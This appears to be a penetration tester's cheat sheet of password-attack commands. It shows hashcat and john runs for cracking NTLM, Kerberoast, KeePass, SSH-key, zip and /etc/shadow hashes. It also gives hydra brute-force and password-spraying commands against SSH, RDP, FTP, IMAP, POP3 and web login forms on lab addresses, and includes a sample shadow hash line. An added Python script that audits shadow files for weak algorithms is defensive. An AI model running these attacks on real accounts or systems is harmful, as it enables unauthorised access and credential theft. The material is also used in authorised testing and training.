Password Brute Forcing

Hashcat Cracking

External Hashcat Wiki

#external_hashcat_wiki

Cracking with Hashcat

#common_hashcat

NTLM Cracking

hashcat -m 1000 james.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Multiple NTLM files

hashcat -m 1000 -a 0 -o cracked.txt ./*.ntlm /usr/share/wordlists/rockyou.txt

NTLMv2 (Net-NTLMv2 challenge/response) Cracking

hashcat -m 5600 -a 0 -o cracked.txt ./*.ntlm /usr/share/wordlists/rockyou.txt

Kerberoast Ticket Hash

Kerberoasted TGS tickets are typically RC4-HMAC (etype 23), which is the format mode 13100 expects.

sudo hashcat -m 13100 hashes.kerberoast2 /usr/share/wordlists/rockyou.txt --force

Keepass Cracking

Transform the database file into a hash with keepass2john:

keepass2john Database.kdbx > keepass.hash

Strip the "Database:" filename prefix that keepass2john prepends (hashcat expects the bare $keepass$ hash):

sed -i 's/Database://g' keepass.hash

Start cracking:

hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force

We might sometimes need a different wordlist, like fasttrack:

hashcat -m 13400 keepass.hash /usr/share/wordlists/fasttrack.txt --force

RSA/OpenSSH Private Keys

hashcat -m 22921 ssh.hash ssh.passwords -r ssh.rule --force

Hydra Brute Forcing

#hydra

SSH Brute Forcing

Brute forcing the SSH password for a single user (here james) on port 2222, using rockyou as the wordlist:

hydra -l james -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.158.201

RDP Brute Forcing

Brute forcing the list of usernames in names.txt with a single password (password spraying):

hydra -L ./names.txt -p "Password123#" rdp://192.168.158.201

FTP Brute Forcing

Brute forcing one account with a wordlist:

hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 21 ftp://192.168.158.202

Post Login Form Brute Forcing

hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.158.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"

The http-post-form argument is three colon-separated parts: the path, the POST body with ^USER^/^PASS^ placeholders, and a string that appears on a failed login.

Multiple usernames, multiple passwords:

hydra -L names.txt -P /usr/share/wordlists/rockyou.txt git.lab.io http-post-form "/user/login:user_name=^USER^&password=^PASS^:Username or password is incorrect."

Using a custom port:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.211.29 -s 8089 http-post-form "/login.php:user=admin&pass=^PASS^&submit=Login:Password incorrect." -v

HTTP Basic Auth Brute Forcing

hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 80 -f 192.168.158.201 http-get /

https://tylerrockwell.github.io/defeating-basic-auth-with-hydra/

IMAP/POP3 Brute Forcing

Create user:password pairs (each user tried with its own name as password) from a users.txt list:

paste -d ':' users.txt users.txt > combined.txt

Brute force using that pairs file (-C reads colon-separated user:pass pairs, -f stops at the first match, -V is verbose):

hydra -C combined.txt 192.168.245.137 imap -V -f

Regular brute forcing (every user against every password in the list):

hydra -L users.txt  -P users.txt 192.168.245.137 pop3 -V -f

Wordlist Generation

CeWL spiders a web page (here to depth 5) and extracts keywords that could be passwords:

cewl -d 5 http://postfish.off/team.html -w pop_passwords.txt

Wpscan Brute Forcing

wpscan --url http://192.168.167.166 --disable-tls-checks -U users.txt -P /usr/share/wordlists/rockyou.txt

Zip file Cracking

Check the zip metadata, including the encryption type:

zipinfo -v secret.zip

Using #john (zip2john produces a hash that john can crack):

zip2john secret.zip > secret.hash

Using #fcrackzip in dictionary mode (-D) with a wordlist (-p):

fcrackzip -D -p /usr/share/wordlists/rockyou.txt secret.zip

Linux password cracking

Direct method (Single user)

Copy the user's full line (user + hash) from /etc/shadow into a file, here sammy.hash:

# Line from /etc/shadow
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::

Then crack it with john (the $id$ prefix of the hash tells john which format it is):

john --wordlist=/usr/share/wordlists/rockyou.txt sammy.hash

Unshadow method (multiple passwords)

We'll get the contents of both /etc/passwd and /etc/shadow, then create a passwords file with unshadow (the passwd file is given first, then the shadow file):

# creating the passwords file
unshadow passwd shadow > passwords

Then proceed with cracking the passwords file:

john --wordlist=/usr/share/wordlists/rockyou.txt passwords

We can see the cracked hashes with:

john --show passwords
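The shadow lines fed to john above have a fixed layout: user, then the password field whose $id$ prefix names the hash algorithm ($5$ on the sammy line is sha256crypt), then the password-ageing fields. The following script is an added example, not part of this cheat sheet: it parses such lines and flags accounts still on legacy algorithms (md5crypt, DES crypt), which is the audit a defender runs before anyone has to crack anything. All sample entries are constructed except the sammy line quoted above.

```python
# Added example (not part of this cheat sheet): parse /etc/shadow lines and
# report which hash algorithm each account uses. Sample entries are constructed,
# except the sammy line quoted above.
import re
from dataclasses import dataclass
from typing import List, Optional

# Modular-crypt id -> (algorithm name, considered legacy today?)
CRYPT_IDS = {"1": ("md5crypt", True), "5": ("sha256crypt", False),
             "6": ("sha512crypt", False), "y": ("yescrypt", False),
             "2a": ("bcrypt", False), "2b": ("bcrypt", False), "2y": ("bcrypt", False)}

@dataclass
class ShadowEntry:
    user: str
    algorithm: str          # "none" when there is no usable hash
    rounds: Optional[int]   # explicit rounds= parameter, if present
    weak: bool
    locked: bool            # empty field, "*" or leading "!" (password login disabled)

def parse_shadow_line(line: str) -> ShadowEntry:
    fields = line.rstrip("\n").split(":")
    if len(fields) < 9:
        raise ValueError(f"not a shadow line: {line!r}")
    user, pw = fields[0], fields[1]
    if pw in ("", "*") or pw.startswith("!"):
        return ShadowEntry(user, "none", None, False, True)
    m = re.match(r"^\$([^$]+)\$(?:rounds=(\d+)\$)?", pw)
    if m is None:
        # no "$id$" prefix: traditional 13-character DES crypt
        return ShadowEntry(user, "descrypt", None, True, False)
    name, weak = CRYPT_IDS.get(m.group(1), ("unknown:" + m.group(1), True))
    rounds = int(m.group(2)) if m.group(2) else None
    return ShadowEntry(user, name, rounds, weak, False)

def audit(lines: List[str]) -> List[ShadowEntry]:
    """Parse every non-empty, non-comment line (the same lines john/hashcat take)."""
    return [parse_shadow_line(l) for l in lines if l.strip() and not l.startswith("#")]

SAMPLE = [
    "sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::",
    "legacy:$1$abcdefgh$ijklmnopqrstuvwxyz0123:19000:0:99999:7:::",
    "svc:$6$rounds=50000$saltsalt$hashhashhash:19000:0:99999:7:::",
    "nologin:*:19000:0:99999:7:::",
]

if __name__ == "__main__":
    for entry in audit(SAMPLE):
        print(entry)
```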

VNC password cracking

Before we can use the vncpwd tool to crack the VNC password, we need to turn the hex string into a .bin file, so that vncpwd gets a real binary password file just like ~/.vnc/passwd and works correctly:

echo BFE625DE518C335B | xxd -r -p > vncpass.bin